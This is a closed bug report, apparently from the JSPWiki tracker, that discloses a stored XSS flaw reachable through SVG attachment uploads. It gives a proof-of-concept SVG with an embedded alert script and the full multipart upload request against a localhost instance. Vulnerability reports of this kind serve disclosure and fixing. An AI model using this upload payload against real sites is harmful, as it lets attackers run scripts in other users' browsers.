Details
-
Bug
-
Status: Closed
-
Major
-
Resolution: Fixed
-
None
-
None
-
Windows new version
Firefox version 84.0.1
Description
- Summary :
XSS exists via upload file.Upload file svg to trigger javascript
* Step to produce:
1. Create svg file with contain:
// <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg>
2. Inurl : http://localhost:8081/wiki_jsp_war/Upload.jsp?page=LeftMenuFooter . Upload file svg.
POST /wiki_jsp_war/attach?progressid=be2d8a23-26ca-4652-ad43-ba7983bf2aa8 HTTP/1.1 Host: localhost:8081 ... -----------------------------308155045040371725912594659801 Content-Disposition: form-data; name="nextpage"/wiki_jsp_war/Upload.jsp?page=LeftMenuFooter -----------------------------308155045040371725912594659801 Content-Disposition: form-data; name="page"LeftMenuFooter -----------------------------308155045040371725912594659801 Content-Disposition: form-data; name="action"upload -----------------------------308155045040371725912594659801 Content-Disposition: form-data; name="kj2ztmbp"; filename="SVG_XSS.svg" Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> -----------------------------308155045040371725912594659801 Content-Disposition: form-data; name="changenote" -----------------------------308155045040371725912594659801 Content-Disposition: form-data; name="upload"Upload -----------------------------308155045040371725912594659801--
3. Open file svg and execute malicious javascript.
Attachments
Attachments
Issue Links
- duplicates
-
JSPWIKI-1106 Attachment forceDownload property
- Closed